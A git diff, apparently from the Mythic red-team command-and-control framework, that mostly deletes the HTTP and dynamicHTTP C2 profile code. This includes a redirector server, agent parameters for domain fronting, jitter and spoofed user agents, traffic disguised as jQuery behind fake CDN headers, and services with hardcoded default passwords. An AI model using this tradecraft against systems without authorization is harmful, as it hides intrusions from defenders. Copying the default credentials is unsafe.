diff --git a/.env b/.env deleted file mode 100755 index 025b67abc..000000000 --- a/.env +++ /dev/null @@ -1,2 +0,0 @@ -COMPOSE_PROJECT_NAME=apfell -POSTGRES_PASSWORD=super_secret_mythic_user_password \ No newline at end of file diff --git a/.gitignore b/.gitignore index 3c1d47a88..d09bc15fb 100755 --- a/.gitignore +++ b/.gitignore @@ -3,7 +3,7 @@ __pycache__/ # Sphinx documentation docs/_build/ # Environments -#.env +.env .venv env/ venv/ @@ -14,12 +14,17 @@ venv.bak/ .idea/ # ssl certs ssl/ -# downloaded files +# Mythic files files/ mythic_access.* postgres-docker/database/ rabbitmq-docker/storage/ -**/transforms.py +C2_profiles/ +Payload_Types/ +Docker_Templates/ +documentation-docker/content/ +display_output.txt +nginx-docker/config/conf.d/services.conf ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. ## @@ -139,4 +144,7 @@ $tf/ # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper -*.DotSettings.user \ No newline at end of file +*.DotSettings.user + +# vscode +.vscode/ \ No newline at end of file diff --git a/Payload_Types/poseidon/agent_code/cd/.gitkeep b/C2_Profiles/.gitkeep old mode 100755 new mode 100644 similarity index 100% rename from Payload_Types/poseidon/agent_code/cd/.gitkeep rename to C2_Profiles/.gitkeep diff --git a/C2_Profiles/HTTP/Dockerfile b/C2_Profiles/HTTP/Dockerfile deleted file mode 100755 index fd1da732e..000000000 --- a/C2_Profiles/HTTP/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 \ No newline at end of file diff --git a/C2_Profiles/HTTP/c2_code/config.json b/C2_Profiles/HTTP/c2_code/config.json deleted file mode 100755 index ef793bb94..000000000 --- a/C2_Profiles/HTTP/c2_code/config.json +++ /dev/null @@ -1,17 +0,0 @@ -{ - "instances": [ - { - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "port": 80, - "key_path": "", - "cert_path": "", - "debug": false - } - ] -} diff --git a/C2_Profiles/HTTP/c2_code/fake.html b/C2_Profiles/HTTP/c2_code/fake.html deleted file mode 100755 index 3968cb8fc..000000000 --- a/C2_Profiles/HTTP/c2_code/fake.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - Page Not Found! 
- - - - - \ No newline at end of file diff --git a/C2_Profiles/HTTP/c2_code/server b/C2_Profiles/HTTP/c2_code/server deleted file mode 100755 index fe3f6d869..000000000 --- a/C2_Profiles/HTTP/c2_code/server +++ /dev/null @@ -1,125 +0,0 @@ -#!/usr/bin/env python3 - -from sanic import Sanic -from sanic.response import html, redirect, text, raw -from sanic.exceptions import NotFound -import sys -import asyncio -import ssl -from pathlib import Path -import requests -import json -import os - -config = {} - -async def print_flush(message): - print(message) - sys.stdout.flush() - - -def server_error_handler(request, exception): - if request is None: - print("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") - sys.stdout.flush() - return html("Error: Failed to process request", status=500, headers={}) - return html("Error: Requested URL {} not found".format(request.url), status=404, headers=config[request.app.name]['headers']) - - -async def agent_message(request, **kwargs): - global config - try: - if config[request.app.name]['debug']: - await print_flush("agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers)) - await print_flush(" and URI: {}".format(request.query_string)) - if config[request.app.name]['debug']: - await print_flush("Forwarding along to: {}".format(config['mythic_address'])) - if request.method == "POST": - # manipulate the request if needed - #await MythicCallbackRPC().add_event_message(message="got a POST message") - response = requests.post(config['mythic_address'], data=request.body, verify=False, cookies=request.cookies, headers=request.headers) - else: - # manipulate the request if needed - #await MythicCallbackRPC().add_event_message(message="got a GET message") - #msg = await MythicCallbackRPC().encrypt_bytes(with_uuid=True, data="my message".encode(), uuid="eaf10700-cb30-402d-b101-8e35d67cdb41") - #await MythicCallbackRPC().add_event_message(message=msg.response) - response = requests.get(config['mythic_address'] + "?{}".format(request.query_string), verify=False, data=request.body, cookies=request.cookies, headers=request.headers) - return raw(response.content, headers=config[request.app.name]['headers'], status=response.status_code) - except Exception as e: - if request is None: - await print_flush("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") - return server_error_handler(request, e) - if config[request.app.name]['debug']: - await print_flush("error in agent_message: {}".format(str(e))) - return server_error_handler(request, e) - - - -if __name__ == "__main__": - sys.path.append("/Mythic/mythic") - from C2ProfileBase import * - from MythicCallbackRPC import * - config_file = open("config.json", 'rb') - main_config = json.loads(config_file.read().decode('utf-8')) - print("Opening config and starting instances...") - sys.stdout.flush() - # basic mapping of the general endpoints to the real endpoints - try: - config['mythic_address'] = os.environ['MYTHIC_ADDRESS'] - except Exception as e: - print("failed to find MYTHIC_ADDRESS environment variable") - sys.stdout.flush() - sys.exit(1) - # now look at the specific instances to start - for inst in main_config['instances']: - config[str(inst['port'])] = {'debug': inst['debug'], - 'headers': inst['ServerHeaders']} - if inst['debug']: - print("Debugging statements are enabled. 
This gives more context, but might be a performance hit") - else: - print("Debugging statements are disabled") - sys.stdout.flush() - # now to create an app instance to handle responses - app = Sanic(str(inst['port'])) - app.config['REQUEST_MAX_SIZE'] = 1000000000 - app.config['REQUEST_TIMEOUT'] = 600 - app.config['RESPONSE_TIMEOUT'] = 600 - app.add_route(agent_message, "/", methods=['GET','POST']) - app.add_route(agent_message, "/", methods=['GET','POST']) - app.error_handler.add(Exception, server_error_handler) - keyfile = Path(inst['key_path']) - certfile = Path(inst['cert_path']) - if keyfile.is_file() and certfile.is_file(): - context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH) - context.load_cert_chain(inst['cert_path'], keyfile=inst['key_path']) - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], ssl=context, debug=False, return_asyncio_server=True, access_log=False) - if inst['debug']: - print("using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - else: - if inst['debug']: - print("not using SSL for port {}".format(inst['port'])) - sys.stdout.flush() - if inst['debug']: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=True) - else: - server = app.create_server(host="0.0.0.0", port=inst['port'], debug=False, return_asyncio_server=True, access_log=False) - task = asyncio.ensure_future(server) - - try: - loop = asyncio.get_event_loop() - def callback(fut): - try: - fetch_count = fut.result() - except: - print("port already in use") - sys.stdout.flush() - sys.exit() - task.add_done_callback(callback) - loop.run_forever() - except: - sys.exit() - loop.stop() diff --git a/C2_Profiles/HTTP/mythic/C2ProfileBase.py b/C2_Profiles/HTTP/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/HTTP/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - 
pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/HTTP/mythic/MythicBaseRPC.py b/C2_Profiles/HTTP/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/HTTP/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - 
self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/HTTP/mythic/MythicCallbackRPC.py b/C2_Profiles/HTTP/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/HTTP/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return 
MythicRPCResponse(resp) diff --git a/C2_Profiles/HTTP/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/HTTP/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index e4ff3b5e9..000000000 --- a/C2_Profiles/HTTP/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response diff --git a/C2_Profiles/HTTP/mythic/c2_functions/HTTP.py b/C2_Profiles/HTTP/mythic/c2_functions/HTTP.py deleted file mode 100644 index df796d9dd..000000000 --- a/C2_Profiles/HTTP/mythic/c2_functions/HTTP.py +++ /dev/null @@ -1,195 +0,0 @@ -from C2ProfileBase import * - - -class HTTP(C2Profile): - name = "HTTP" - description = "Uses HTTP(S) connections with a simple query parameter or basic POST messages. For more configuration options use dynamicHTTP." - author = "@its_a_feature_" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="80", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="killdate", - description="Kill Date", - parameter_type=ParameterType.Date, - default_value=365, - required=False, - ), - C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, - ), - C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="23", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - default_value="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - required=False, - ), - C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="https://domain.com", - verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="get_uri", - description="GET request URI", - default_value="index", - required=True, - ), - C2ProfileParameter( - name="post_uri", - description="POST request URI", - default_value="data", - required=True, - ), - C2ProfileParameter( - name="query_path_name", - description="Name of the query parameter", - default_value="q", - required=True, - ), - C2ProfileParameter( - name="proxy_host", - description="Proxy Host", - default_value="", - required=False, - verifier_regex="^$|^(http|https):\/\/[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="proxy_port", - description="Proxy Port", - default_value="", - verifier_regex="^$|^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="proxy_user", - description="Proxy Username", - default_value="", - required=False, - ), - C2ProfileParameter( - name="proxy_pass", - description="Proxy Password", - default_value="", - required=False, - ), - 
C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - ] -""" -C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="80", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, - ), - C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="23", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="https://domain.com", - parameter_type=ParameterType.Array, - verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", - ), - - C2ProfileParameter( - name="killdate", - description="Kill Date", - parameter_type=ParameterType.Date, - default_value=365, - required=False, - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - required=False, - parameter_type=ParameterType.Dictionary, - default_value=[ - { - "name": "USER_AGENT", - "max": 1, - "default_value": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - "default_show": True, - }, - { - "name": "host", - "max": 2, - "default_value": "", - "default_show": False, - }, - { - "name": "*", - "max": -1, - "default_value": "", - "default_show": False - } - ] - ), - C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ),""" \ No newline at end of file diff --git a/C2_Profiles/HTTP/mythic/mythic_service.py b/C2_Profiles/HTTP/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/HTTP/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." 
+ pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - 
file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! 
" + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except 
Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/dynamicHTTP/Dockerfile b/C2_Profiles/dynamicHTTP/Dockerfile deleted file mode 100755 index beabdbb2f..000000000 --- a/C2_Profiles/dynamicHTTP/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 diff --git a/C2_Profiles/dynamicHTTP/c2_code/agent_config.json b/C2_Profiles/dynamicHTTP/c2_code/agent_config.json deleted file mode 100755 index 978837fa8..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/agent_config.json +++ /dev/null @@ -1,141 +0,0 @@ -{ - "GET": { - "ServerBody": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": ["!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 